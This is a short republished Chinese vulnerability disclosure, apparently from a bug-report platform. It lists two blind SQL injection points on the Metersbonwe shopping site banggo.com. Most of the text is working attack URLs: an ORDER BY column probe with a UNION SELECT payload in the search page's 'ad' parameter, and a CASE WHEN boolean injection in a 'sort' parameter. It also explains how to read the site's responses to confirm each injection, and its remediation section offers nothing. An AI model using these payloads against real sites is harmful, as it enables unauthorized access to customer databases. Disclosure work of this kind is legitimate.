美特斯邦威官方商城某两处盲注 详细说明: 盲注一: http://www.banggo.com/Search.s html ?cid=1&dis=[0-9.5]&ad=155%20order%20by%2017%23 http://www.banggo.com/Search.shtml?cid=1&dis=[0-9.5]&ad=155%20and%201=2%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%23 可以试试输入不同的SQL语句来证明这是注入。。。正确的语句返回正常,错误的语句返回错误。 盲注二:www.2cto.com http://k.banggo.com/Child/playerlist.shtml?sort=(case when(1=1) then no else email end)%23 order by 注入 根据when 的条件和显示的排序结果来注入。 修复方案: 应该懂 作者kobin97
查看更多关于美特斯邦威官方商城及大赛子站两处盲注 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11922